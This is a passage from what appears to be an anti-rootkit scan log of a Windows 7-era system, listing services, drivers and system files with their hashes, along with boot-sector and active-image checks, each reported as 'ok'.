12:17:17.0530 0x1aa8 ws2ifsl - ok
12:17:17.0537 0x1aa8 [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc C:\Windows\system32\wscsvc.dll
12:17:17.0559 0x1aa8 wscsvc - ok
12:17:17.0562 0x1aa8 WSearch - ok
12:17:17.0631 0x1aa8 [ D9EF901DCA379CFE914E9FA13B73B4C4, 3BE9693B7B2AFEE23D72AF5DA211379724D752F0EC18ACB7D3DE3DDFC5AE0004 ] wuauserv C:\Windows\system32\wuaueng.dll
12:17:17.0705 0x1aa8 wuauserv - ok
12:17:17.0715 0x1aa8 [ AB886378EEB55C6C75B4F2D14B6C869F, D6C4602EB8F291DADEDF3CD211013D4AC752DDE7E799C2D8D74AA4F5477CAED6 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
12:17:17.0730 0x1aa8 WudfPf - ok
12:17:17.0739 0x1aa8 [ DDA4CAF29D8C0A297F886BFE561E6659, 94E5DD649B5D86FA1A7C7D30FCF9644D0EE048D312E626111458ADF66BFBE978 ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
12:17:17.0759 0x1aa8 WUDFRd - ok
12:17:17.0765 0x1aa8 [ B20F051B03A966392364C83F009F7D17, 88ECEB55AE91F58F592B96EBC10B572747D5A2F9B7629E8F371761E4F7408A65 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
12:17:17.0782 0x1aa8 wudfsvc - ok
12:17:17.0792 0x1aa8 [ 04F82965C09CBDF646B487E145060301, 2CD8533EDBE24C3E42EB7550E20F8A2EB9E5E345B165DEF543163A6BC1FDD18B ] WwanSvc C:\Windows\System32\wwansvc.dll
12:17:17.0815 0x1aa8 WwanSvc - ok
12:17:17.0824 0x1aa8 [ F14C9B3A8DF6E21F83AC63FA1ADC6D51, DBF6546A4CB56029E45D2C82E42790D8EBFD03CF20AEE3C93A3892D9BB888BDF ] ZTEusbmdm6k C:\Windows\system32\DRIVERS\ZTEusbmdm6k.sys
12:17:17.0842 0x1aa8 ZTEusbmdm6k - ok
12:17:17.0850 0x1aa8 [ F14C9B3A8DF6E21F83AC63FA1ADC6D51, DBF6546A4CB56029E45D2C82E42790D8EBFD03CF20AEE3C93A3892D9BB888BDF ] ZTEusbnmea C:\Windows\system32\DRIVERS\ZTEusbnmea.sys
12:17:17.0865 0x1aa8 ZTEusbnmea - ok
12:17:17.0872 0x1aa8 [ F14C9B3A8DF6E21F83AC63FA1ADC6D51, DBF6546A4CB56029E45D2C82E42790D8EBFD03CF20AEE3C93A3892D9BB888BDF ] ZTEusbser6k C:\Windows\system32\DRIVERS\ZTEusbser6k.sys
12:17:17.0888 0x1aa8 ZTEusbser6k - ok
12:17:17.0894 0x1aa8 [ F14C9B3A8DF6E21F83AC63FA1ADC6D51, DBF6546A4CB56029E45D2C82E42790D8EBFD03CF20AEE3C93A3892D9BB888BDF ] ZTEusbvoice C:\Windows\system32\DRIVERS\ZTEusbvoice.sys
12:17:17.0910 0x1aa8 ZTEusbvoice - ok
12:17:17.0921 0x1aa8 ================ Scan global ===============================
12:17:17.0925 0x1aa8 [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\system32\basesrv.dll
12:17:17.0934 0x1aa8 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
12:17:17.0947 0x1aa8 [ 88EDD0B34EED542745931E581AD21A32, DC2B93E1CEF5B0BCEE08D72669BB0F3AD0E8E6E75BDC08858407ED92F6FFA031 ] C:\Windows\system32\winsrv.dll
12:17:17.0955 0x1aa8 [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
12:17:17.0968 0x1aa8 [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\system32\services.exe
12:17:17.0976 0x1aa8 [ Global ] - ok
12:17:17.0977 0x1aa8 ================ Scan MBR ==================================
12:17:17.0979 0x1aa8 [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
12:17:18.0108 0x1aa8 \Device\Harddisk0\DR0 - ok
12:17:18.0108 0x1aa8 ================ Scan VBR ==================================
12:17:18.0111 0x1aa8 [ 0C8447A1071E0362E7E9C1F41A3F0AB3 ] \Device\Harddisk0\DR0\Partition1
12:17:18.0112 0x1aa8 \Device\Harddisk0\DR0\Partition1 - ok
12:17:18.0115 0x1aa8 [ 063845E07F3B1F25513E30220DD21CFF ] \Device\Harddisk0\DR0\Partition2
12:17:18.0116 0x1aa8 \Device\Harddisk0\DR0\Partition2 - ok
12:17:18.0119 0x1aa8 [ AB706629E9752D0E712769C6A571BB11 ] \Device\Harddisk0\DR0\Partition3
12:17:18.0120 0x1aa8 \Device\Harddisk0\DR0\Partition3 - ok
12:17:18.0122 0x1aa8 [ 5280A8B232AA5A97D521784FC364158F ] \Device\Harddisk0\DR0\Partition4
12:17:18.0123 0x1aa8 \Device\Harddisk0\DR0\Partition4 - ok
12:17:18.0124 0x1aa8 ================ Scan active images ========================
12:17:18.0126 0x1aa8 [ 3E588B60EC061686BA05D33574A344C6, 19D2D863F95CCC4493A2328B6BEB04248B6A80F957532E58C1D1D868C19FDCCB ] C:\Windows\System32\drivers\crashdmp.sys
12:17:18.0126 0x1aa8 C:\Windows\System32\drivers\crashdmp.sys - ok
12:17:18.0130 0x1aa8 [ F981817D0BD03EAC4FA60D0B2551A310, 662CA75185EEAA9D622834F95BC6B8FB48C5732FA5C14D08043C545916FB7F47 ] C:\Windows\System32\drivers\iaStor.sys
12:17:18.0130 0x1aa8 C:\Windows\System32\drivers\iaStor.sys - ok
12:17:18.0133 0x1aa8 [ 814DB88F2641691575A455CF25354098, 79C50F0CD72612733217A0316BEFEA0B6D819C3159D9452EAB89AC26A18A0F89 ] C:\Windows\System32\drivers\dumpfve.sys
12:17:18.0134 0x1aa8 C:\Windows\System32\drivers\dumpfve.sys - ok
12:17:18.0137 0x1aa8 [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] C:\Windows\System32\drivers\cdrom.sys
12:17:18.0137 0x1aa8 C:\Windows\System32\drivers\cdrom.sys - ok
12:17:18.0141 0x1aa8 [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] C:\Windows\System32\drivers\beep.sys
12:17:18.0141 0x1aa8 C:\Windows\System32\drivers\beep.sys - ok
12:17:18.0145 0x1aa8 [ 248C952C82DF1E23775432774CBB20F1, D04D382E7963B84E4856534A2FA209787FEBA2B6F21F579CA8F7C6BE4AA10072 ] C:\Windows\System32\drivers\MCLIENTx64\0302020.00C\ccsetx64.sys
12:17:18.0145 0x1aa8 C:\Windows\System32\drivers\MCLIENTx64\0302020.00C\ccsetx64.sys - ok
12:17:18.0149 0x1aa8 [ 9899284589F75FA8724FF3D16AED75C1, 181188599FD5D4DE33B97010D9E0CAEABAB9A3EF50712FE7F9AA0735CD0666D6 ] C:\Windows\System32\drivers\null.sys
12:17:18.0149 0x1aa8 C:\Windows\System32\drivers\null.sys - ok
12:17:18.0152 0x1aa8 [ 53E92A310193CB3C03BEA963DE7D9CFC, 45898604375B42EB1246C17A22D91C2440F11C746FF6459AD38027C1BC2E3125 ] C:\Windows\System32\drivers\vga.sys
12:17:18.0152 0x1aa8 C:\Windows\System32\drivers\vga.sys - ok
12:17:18.0156 0x1aa8 [ E7353D59C9842BC7299FAEB7E7E09340, C37ED1025E07BAC2F535DCFED6C6C509515D95722EADE5AF94F1FC5D8B1DC783 ] C:\Windows\System32\drivers\videoprt.sys
12:17:18.0156 0x1aa8 C:\Windows\System32\drivers\videoprt.sys - ok
12:17:18.0159 0x1aa8 [ FC438D1430B28618E2D0C7C332A710AD, 873957B202E454E2C8F625E5799F278CAC16EC5EEAEE2C33E2FE5D1FF0408CB2 ] C:\Windows\System32\drivers\watchdog.sys
12:17:18.0159 0x1aa8 C:\Windows\System32\drivers\watchdog.sys - ok
12:17:18.0164 0x1aa8 [ AA3FB40E17CE1388FA1BEDAB50EA8F96, 69F93E15536644C8FD679A20190CFE577F4985D3B1B4A4AA250A168615AE1E99 ] C:\Windows\System32\drivers\msfs.sys
12:17:18.0164 0x1aa8 C:\Windows\System32\drivers\msfs.sys - ok
12:17:18.0168 0x1aa8 [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] C:\Windows\System32\drivers\RDPCDD.sys
12:17:18.0168 0x1aa8 C:\Windows\System32\drivers\RDPCDD.sys - ok
12:17:18.0171 0x1aa8 [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] C:\Windows\System32\drivers\RDPENCDD.sys
12:17:18.0171 0x1aa8 C:\Windows\System32\drivers\RDPENCDD.sys - ok
12:17:18.0175 0x1aa8 [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] C:\Windows\System32\drivers\RDPREFMP.sys
12:17:18.0175 0x1aa8 C:\Windows\System32\drivers\RDPREFMP.sys - ok
12:17:18.0178 0x1aa8 [ 1E4C4AB5C9B8DD13179BBDC75A2A01F7, D8957EF7060A69DBB3CD6B2C45B1E4143592AB8D018471E17AC04668157DC67F ] C:\Windows\System32\drivers\npfs.sys
12:17:18.0178 0x1aa8 C:\Windows\System32\drivers\npfs.sys - ok
12:17:18.0182 0x1aa8 [ 6F020A220388ECA0AB6062DC27BD16B6, 48655230E482DEB7B4B50EF05818EBB29CA61E780AEFCD9D31B02DE4DF9D9540 ] C:\Windows\System32\drivers\tdi.sys
12:17:18.0182 0x1aa8 C:\Windows\System32\drivers\tdi.sys - ok
12:17:18.0186 0x1aa8 [ DDAD5A7AB24D8B65F8D724F5C20FD806, B71F2967A4EE7395E4416C1526CB85368AEA988BDD1F2C9719C48B08FAFA9661 ] C:\Windows\System32\drivers\tdx.sys
12:17:18.0186 0x1aa8 C:\Windows\System32\drivers\tdx.sys - ok
12:17:18.0189 0x1aa8 [ 79059559E89D06E8B80CE2944BE20228, 6E041D2FED2D0C3D8E16E56CB61D3245F9144EA92F5BDC9A4AA30598D1C8E6EE ] C:\Windows\System32\drivers\afd.sys
12:17:18.0190 0x1aa8 C:\Windows\System32\drivers\afd.sys - ok
12:17:18.0193 0x1aa8 [ 09594D1089C523423B32A4229263F068, 7426A9B8BA27D3225928DDEFBD399650ABB90798212F56B7D12158AC22CCCE37 ] C:\Windows\System32\drivers\netbt.sys
12:17:18.0193 0x1aa8 C:\Windows\System32\drivers\netbt.sys - ok
12:17:18.0197 0x1aa8 [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] C:\Windows\System32\drivers\pacer.sys
12:17:18.0197 0x1aa8 C:\Windows\System32\drivers\pacer.sys - ok
12:17:18.0201 0x1aa8 [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] C:\Windows\System32\drivers\wfplwf.sys
12:17:18.0201 0x1aa8 C:\Windows\System32\drivers\wfplwf.sys - ok
12:17:18.0204 0x1aa8 [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] C:\Windows\System32\drivers\ws2ifsl.sys
12:17:18.0204 0x1aa8 C:\Windows\System32\drivers\ws2ifsl.sys - ok
12:17:18.0208 0x1aa8 [ 86743D9F5D2B1048062B14B1D84501C4, DBF6D6A60AB774FCB0F464FF2D285A7521D0A24006687B243AB46B17D8032062 ] C:\Windows\System32\drivers\netbios.sys
12:17:18.0208 0x1aa8 C:\Windows\System32\drivers\netbios.sys - ok
12:17:18.0211 0x1aa8 [ 6A3D66263414FF0D6FA754C646612F3F, 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB ] C:\Windows\System32\drivers\vwififlt.sys
12:17:18.0211 0x1aa8 C:\Windows\System32\drivers\vwififlt.sys - ok
12:17:18.0216 0x1aa8 [ 356AFD78A6ED4457169241AC3965230C, CE4D1EE3525C10AC658B20776C3E444DE44874C837713DC5311386EDFCB18399 ] C:\Windows\System32\drivers\wanarp.sys
12:17:18.0216 0x1aa8 C:\Windows\System32\drivers\wanarp.sys - ok
12:17:18.0219 0x1aa8 [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] C:\Windows\System32\drivers\rdbss.sys
12:17:18.0220 0x1aa8 C:\Windows\System32\drivers\rdbss.sys - ok
12:17:18.0223 0x1aa8 [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] C:\Windows\System32\drivers\termdd.sys
12:17:18.0223 0x1aa8 C:\Windows\System32\drivers\termdd.sys - ok
12:17:18.0226 0x1aa8 [ 0EED230E37515A0EAEE3C2E1BC97B288, B1D8F8A75006B6E99214CA36D27A8594EF8D952F315BEB201E9BAC9DE3E64D42 ] C:\Windows\System32\drivers\mssmbios.sys
12:17:18.0227 0x1aa8 C:\Windows\System32\drivers\mssmbios.sys - ok
12:17:18.0230 0x1aa8 [ E7F5AE18AF4168178A642A9247C63001, 133023B7E4BA8049C4CAED3282BDD25571D1CC25FAC3B820C7F981D292689D76 ] C:\Windows\System32\drivers\nsiproxy.sys
12:17:18.0230 0x1aa8 C:\Windows\System32\drivers\nsiproxy.sys - ok
12:17:18.0234 0x1aa8 [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] C:\Windows\System32\drivers\blbdrive.sys
12:17:18.0234 0x1aa8 C:\Windows\System32\drivers\blbdrive.sys - ok
12:17:18.0238 0x1aa8 [ 9BB2EF44EAA163B29C4A4587887A0FE4, 03667BC3EA5003F4236929C10F23D8F108AFCB29DB5559E751FB26DFB318636F ] C:\Windows\System32\drivers\dfsc.sys
12:17:18.0238 0x1aa8 C:\Windows\System32\drivers\dfsc.sys - ok
12:17:18.0241 0x1aa8 [ 13096B05847EC78F0977F2C0F79E9AB3, 1E44981B684F3E56F5D2439BB7FA78BD1BC876BB2265AE089AEC68F241B05B26 ] C:\Windows\System32\drivers\discache.sys
12:17:18.0241 0x1aa8 C:\Windows\System32\drivers\discache.sys - ok
12:17:18.0245 0x1aa8 [ 3566A8DAAFA27AF944F5D705EAA64894, AE9D8B648DA08AF667B9456C3FE315489859C157510A258559F18238F2CC92B8 ] C:\Windows\System32\drivers\tunnel.sys
12:17:18.0245 0x1aa8 C:\Windows\System32\drivers\tunnel.sys - ok
12:17:18.0248 0x1aa8 [ CAAAC014C5C56A69F710B5F1B836DE22, DA98EF2EBF9A7F180344A88CC2C74F69101E17BBAB58B1C46176FD6EE7AA2E6A ] C:\Windows\System32\ntdll.dll
12:17:18.0249 0x1aa8 C:\Windows\System32\ntdll.dll - ok
12:17:18.0253 0x1aa8 [ F0970A4BC8395659C22BF53D0FADF16F, 23BE3066D89A5ACBF8130899640D377476E78B6C3D19E2D13C32238464A83E21 ] C:\Windows\System32\smss.exe
12:17:18.0253 0x1aa8 C:\Windows\System32\smss.exe - ok
12:17:18.0256 0x1aa8 [ 3B536A8BEC3B4F23FFDFD78B11A2AB93, 7BC847CE6C2D29C334F0D1600BBBDE3933FF45F6BEE5186F442E6270A3F9EC4E ] C:\Windows\System32\autochk.exe
12:17:18.0256 0x1aa8 C:\Windows\System32\autochk.exe - ok
12:17:18.0259 0x1aa8 [ 0D1B8C64BDF0E5CDC523A1409FFB5EF0, 92F264325C3B1F70E0ACDBC886F7DC4C32371759EA94CE359B0FABD89573DCA4 ] C:\Windows\System32\drivers\igdkmd64.sys
12:17:18.0259 0x1aa8 C:\Windows\System32\drivers\igdkmd64.sys - ok
12:17:18.0263 0x1aa8 [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] C:\Windows\System32\drivers\fastfat.sys
12:17:18.0263 0x1aa8 C:\Windows\System32\drivers\fastfat.sys - ok
12:17:18.0267 0x1aa8 [ 53BD875C7C0808235BFB803C1A8BE009, E56CFA0BD65E09C5F6957E1BF89824A3DF53E715A5BAE5B649D85C3AFF23D2C4 ] C:\Windows\System32\drivers\dxgkrnl.sys
12:17:18.0267 0x1aa8 C:\Windows\System32\drivers\dxgkrnl.sys - ok
12:17:18.0271 0x1aa8 [ E6DE47E2B2E36018E071D4E44AEBBFAC, 0FD3A19EE869EE174BBB14732D690A99CEE4589BD2E7B374AB1274CC1FB87475 ] C:\Windows\System32\drivers\dxgmms1.sys
12:17:18.0271 0x1aa8 C:\Windows\System32\drivers\dxgmms1.sys - ok
12:17:18.0275 0x1aa8 [ 32417AE8280276968E5C551ED85D3525, 8DF450B6CBBDB65A71B2849EDA57711BC7AF54A31335013F30EDD43E5449961A ] C:\Windows\System32\urlmon.dll
12:17:18.0275 0x1aa8 C:\Windows\System32\urlmon.dll - ok
12:17:18.0278 0x1aa8 [ A6518DCC42F7A6E999BB3BEA8FD87567, 8A9AE992F93F37E0723761EA271A7E1AA8172702C471041A17324474FC96B9BC ] C:\Windows\System32\drivers\HECIx64.sys
12:17:18.0278 0x1aa8 C:\Windows\System32\drivers\HECIx64.sys - ok
12:17:18.0282 0x1aa8 [ 12FEB33791920678F8433701C822BCFD, 7D1AD944CF0532D5AF951ACCE064EA9288F068964603674854CD7658D2B96039 ] C:\Windows\System32\drivers\usbport.sys
12:17:18.0282 0x1aa8 C:\Windows\System32\drivers\usbport.sys - ok
12:17:18.0286 0x1aa8 [ 97BFED39B6B79EB12CDDBFEED51F56BB, 3CF981D668FB2381E52AF2E51E296C6CFB47B0D62249645278479D0111A47955 ] C:\Windows\System32\drivers\hdaudbus.sys
12:17:18.0286 0x1aa8 C:\Windows\System32\drivers\hdaudbus.sys - ok
12:17:18.0289 0x1aa8 [ 18A85013A3E0F7E1755365D287443965, 811C5EDF38C765BCF71BCE25CB6626FF6988C3699F5EF1846240EA0052F34C33 ] C:\Windows\System32\drivers\usbehci.sys
12:17:18.0290 0x1aa8 C:\Windows\System32\drivers\usbehci.sys - ok
12:17:18.0293 0x1aa8 [ C391FC68282A000CDF953F8B6B55D2EF, 1CB0DAB84545D9FDEA5A7865A1E7132CEAC91DECF8B100285B63098D7B09E584 ] C:\Windows\System32\msvcrt.dll
12:17:18.0293 0x1aa8 C:\Windows\System32\msvcrt.dll - ok
12:17:18.0296 0x1aa8 [ D87E1E59C73C1F98D5DED5B3850C40F5, 536419BFF9F877D4314B5D0C045D9A6E729489C389863FADF07E382050BC84FD ] C:\Windows\System32\psapi.dll
12:17:18.0296 0x1aa8 C:\Windows\System32\psapi.dll - ok
12:17:18.0300 0x1aa8 [ 637646C63222E6ADCC19AF89983533E4, 9C40A2705FFC83012CF2C1D80F6DB53A07E86C94239406BE0C1EF1F0A3965844 ] C:\Windows\System32\drivers\Rt64win7.sys
12:17:18.0300 0x1aa8 C:\Windows\System32\drivers\Rt64win7.sys - ok
12:17:18.0304 0x1aa8 [ 427015D56DF17241F634611557146C57, BCDC51FE0D88AA8FB3815B401A682D38F24BE7D9CAC8B9F9588295A66D036DDB ] C:\Windows\System32\shell32.dll
12:17:18.0304 0x1aa8 C:\Windows\System32\shell32.dll - ok
12:17:18.0307 0x1aa8 [ FBC76C8D561D0AD159EF9452D9F328F6, 3A1A3E8ED48316ACF833554C50CAA3278C980F139332E9F35D889F1C46532FAA ] C:\Windows\System32\drivers\BCMWL664.SYS
12:17:18.0307 0x1aa8 C:\Windows\System32\drivers\BCMWL664.SYS - ok
12:17:18.0310 0x1aa8 [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] C:\Windows\System32\drivers\vwifibus.sys
12:17:18.0310 0x1aa8 C:\Windows\System32\drivers\vwifibus.sys - ok
12:17:18.0314 0x1aa8 [ 6E5C3D18C3BCC72AA527DBC5FA61AB8F, DED50163906A86A55E299AAEE127B00EFCCEA7DF26AC962568C91935A13A1562 ] C:\Windows\System32\drivers\RtsPStor.sys
12:17:18.0314 0x1aa8 C:\Windows\System32\drivers\RtsPStor.sys - ok
12:17:18.0318 0x1aa8 [ 5F3982B51A5DF6F7FF5FD3A4CE0BFF5D, 99F99A96A310B701981B55F287C3685CBBBA3D7B810675C90DD78E4CE4E12180 ] C:\Windows\System32\drivers\FLxHCIc.sys
12:17:18.0318 0x1aa8 C:\Windows\System32\drivers\FLxHCIc.sys - ok
12:17:18.0322 0x1aa8 [ 111E0EBC0AD79CB0FA014B907B231CF0, B7D43D156C2524938503CF8E99C4D1F7A5C55E16C0368F57F4CD23C6D833B38F ] C:\Windows\System32\drivers\sdbus.sys
12:17:18.0322 0x1aa8 C:\Windows\System32\drivers\sdbus.sys - ok
12:17:18.0325 0x1aa8 [ FFA06EF43987ED0DD42AD59B260C0C78, 260518D5E077E55E0F2099037DBEFA93016FD4D4655456DDB3147AF9CBE7BF6B ] C:\Windows\System32\drivers\usbd.sys
12:17:18.0325 0x1aa8 C:\Windows\System32\drivers\usbd.sys - ok
12:17:18.0329 0x1aa8 [ FA55C73D4AFFA7EE23AC4BE53B4592D3, 65CDDC62B89A60E942C5642C9D8B539EFB69DA8069B4A2E54978154B314531CD ] C:\Windows\System32\drivers\i8042prt.sys
12:17:18.0329 0x1aa8 C:\Windows\System32\drivers\i8042prt.sys - ok
12:17:18.0332 0x1aa8 [ BC02336F1CBA7DCC7D1213BB588A68A5, 450C5BAD54CCE2AFCDFF1B6E7F8E1A8446D9D3255DF9D36C29A8F848048AAD93 ] C:\Windows\System32\drivers\kbdclass.sys
12:17:18.0332 0x1aa8 C:\Windows\System32\drivers\kbdclass.sys - ok
12:17:18.0337 0x1aa8 [ AC3CC98B1BDB6540021D3FFB105AC2B9, 671146CC16139AECE0BCCC44983807E045A930E262F64461D0D882A0A0B77E4F ] C:\Windows\System32\drivers\SynTP.sys
12:17:18.0337 0x1aa8 C:\Windows\System32\drivers\SynTP.sys - ok
12:17:18.0341 0x1aa8 [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] C:\Windows\System32\drivers\CmBatt.sys
12:17:18.0341 0x1aa8 C:\Windows\System32\drivers\CmBatt.sys - ok
12:17:18.0344 0x1aa8 [ 7D27EA49F3C1F687D357E77A470AEA99, 7FE7CAF95959F127C6D932C01D539C06D80273C49A09761F6E8331C05B1A7EE7 ] C:\Windows\System32\drivers\mouclass.sys
12:17:18.0344 0x1aa8 C:\Windows\System32\drivers\mouclass.sys - ok
12:17:18.0348 0x1aa8 [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] C:\Windows\System32\drivers\wmiacpi.sys
12:17:18.0348 0x1aa8 C:\Windows\System32\drivers\wmiacpi.sys - ok
12:17:18.0351 0x1aa8 [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] C:\Windows\System32\drivers\CompositeBus.sys
12:17:18.0351 0x1aa8 C:\Windows\System32\drivers\CompositeBus.sys - ok
12:17:18.0356 0x1aa8 [ ADA036632C664CAA754079041CF1F8C1, F2386CC09AC6DE4C54189154F7D91C1DB7AA120B13FAE8BA5B579ACF99FCC610 ] C:\Windows\System32\drivers\intelppm.sys
12:17:18.0356 0x1aa8 C:\Windows\System32\drivers\intelppm.sys - ok
12:17:18.0359 0x1aa8 [ 6DC22BDAA595BE00F19696E72F2F3312, B46B50395100D3A23663C56CC395A874130B72E314997AAD6C52F0C5C23364C4 ] C:\Windows\System32\drivers\irstrtdv.sys
12:17:18.0359 0x1aa8 C:\Windows\System32\drivers\irstrtdv.sys - ok
12:17:18.0363 0x1aa8 [ F220BA78AB542C70211D73AE4729B2CD, D65C624277BA7FAA84579B29DD42852856F7BFAE82FD7A8CAFBB3E5F3E550CEC ] C:\Windows\System32\wininet.dll
12:17:18.0363 0x1aa8 C:\Windows\System32\wininet.dll - ok
12:17:18.0366 0x1aa8 [ 24FBF5CC5C04150073C315A7C83521EE, 581BD5F15B5E57B3BAA762E421FFD859FDA46DDB8515C2A7AAFF208D784E906C ] C:\Windows\System32\drivers\ks.sys
12:17:18.0366 0x1aa8 C:\Windows\System32\drivers\ks.sys - ok
12:17:18.0370 0x1aa8 [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] C:\Windows\System32\drivers\agilevpn.sys
12:17:18.0370 0x1aa8 C:\Windows\System32\drivers\agilevpn.sys - ok
12:17:18.0372 0x1aa8 [ 50F92C943F18B070F166D019DFAB3D9A, A997EAFFC1598B1D0A9E1A4475F25418CA8AA6B703B53A71B1AF028E247C9950 ] C:\Windows\System32\drivers\clwvd.sys
12:17:18.0372 0x1aa8 C:\Windows\System32\drivers\clwvd.sys - ok
12:17:18.0376 0x1aa8 [ 6869281E78CB31A43E969F06B57347C4, 866A23E69B32A78D378D6CB3B3DA3695FFDFF0FEC3C9F68C8C3F988DF417044B ] C:\Windows\System32\drivers\ksthunk.sys
12:17:18.0376 0x1aa8 C:\Windows\System32\drivers\ksthunk.sys - ok
12:17:18.0380 0x1aa8 [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] C:\Windows\System32\drivers\rasl2tp.sys
12:17:18.0380 0x1aa8 C:\Windows\System32\drivers\rasl2tp.sys - ok
12:17:18.0383 0x1aa8 [ 30639C932D9FEF22B31268FE25A1B6E5, 32873D95339600F6EEFA51847D12C563FF01F320DC59055B242FA2887C99F9D6 ] C:\Windows\System32\drivers\ndistapi.sys
12:17:18.0383 0x1aa8 C:\Windows\System32\drivers\ndistapi.sys - ok
12:17:18.0387 0x1aa8 [ 53F7305169863F0A2BDDC49E116C2E11, 881E9346D3C02405B7850ADC37E720990712EC9C666A0CE96E252A487FD2CE77 ] C:\Windows\System32\drivers\ndiswan.sys
12:17:18.0387 0x1aa8 C:\Windows\System32\drivers\ndiswan.sys - ok
12:17:18.0391 0x1aa8 [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] C:\Windows\System32\drivers\raspppoe.sys
12:17:18.0391 0x1aa8 C:\Windows\System32\drivers\raspppoe.sys - ok
12:17:18.0394 0x1aa8 [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] C:\Windows\System32\drivers\raspptp.sys
12:17:18.0394 0x1aa8 C:\Windows\System32\drivers\raspptp.sys - ok
12:17:18.0398 0x1aa8 [ 56325BB1FF19F2A5AC8713756AC41140, B2124E57783312EE37D2621E689D8FB4C43A04BDBD4F481225C21038605A28CE ] C:\Windows\System32\gdi32.dll
12:17:18.0398 0x1aa8 C:\Windows\System32\gdi32.dll - ok
12:17:18.0401 0x1aa8 [ 044FE45FFD6AD40E3BBBE60B7F41BABE, A1688A5E6E0F7037C850699462C2655006A7D873C97F9AB406C59D81749B6F09 ] C:\Windows\System32\nsi.dll
12:17:18.0401 0x1aa8 C:\Windows\System32\nsi.dll - ok
12:17:18.0405 0x1aa8 [ F7CE0C81C545364020ED8203CF0A633E, 24B47A7492B7048096AF87E26786E8108455ADBD1A374B6A0466DE008505B8A9 ] C:\Windows\System32\difxapi.dll
12:17:18.0405 0x1aa8 C:\Windows\System32\difxapi.dll - ok
12:17:18.0409 0x1aa8 [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] C:\Windows\System32\drivers\rassstp.sys
12:17:18.0409 0x1aa8 C:\Windows\System32\drivers\rassstp.sys - ok
12:17:18.0412 0x1aa8 [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] C:\Windows\System32\drivers\swenum.sys
12:17:18.0412 0x1aa8 C:\Windows\System32\drivers\swenum.sys - ok
12:17:18.0416 0x1aa8 [ DC54A574663A895C8763AF0FA1FF7561, 09A3F3597E91CBEB2F38E96E75134312B60CAE5574B2AD4606C2D3E992AEDDFE ] C:\Windows\System32\drivers\umbus.sys
12:17:18.0416 0x1aa8 C:\Windows\System32\drivers\umbus.sys - ok
12:17:18.0419 0x1aa8 [ 83404DCBCE4925B6A5A77C5170F46D86, D669614D0B4461DB244AD99FBE1BA92CEB9B4ED5EC8E987E23764E77D9AC7074 ] C:\Windows\System32\sechost.dll
12:17:18.0419 0x1aa8 C:\Windows\System32\sechost.dll - ok
